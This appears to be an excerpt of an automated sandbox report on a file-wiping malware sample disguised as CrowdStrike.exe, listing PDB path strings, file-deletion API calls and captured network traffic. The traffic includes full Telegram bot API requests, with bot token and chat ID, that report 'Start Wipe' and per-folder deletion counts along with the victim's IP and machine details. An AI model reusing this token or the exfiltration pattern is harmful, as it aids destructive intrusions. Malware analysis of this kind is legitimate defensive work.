        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qLC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q}C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qxC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdbt source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qXC:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qzC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qGC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qvC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qwC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B

        Networking

        barindex
        Uses the Telegram API (likely for C&C communication)
        Source: unknownDNS query: name: api.telegram.org
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
        Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: icanhazip.com
        Source: unknownDNS query: name: icanhazip.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT
        Source: global trafficDNS traffic detected: DNS query: icanhazip.com
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
        Source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
        Source: RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
        Source: CrowdStrike.exe, 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp, CrowdStrike.exe, 00000000.00000000.1686299423.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
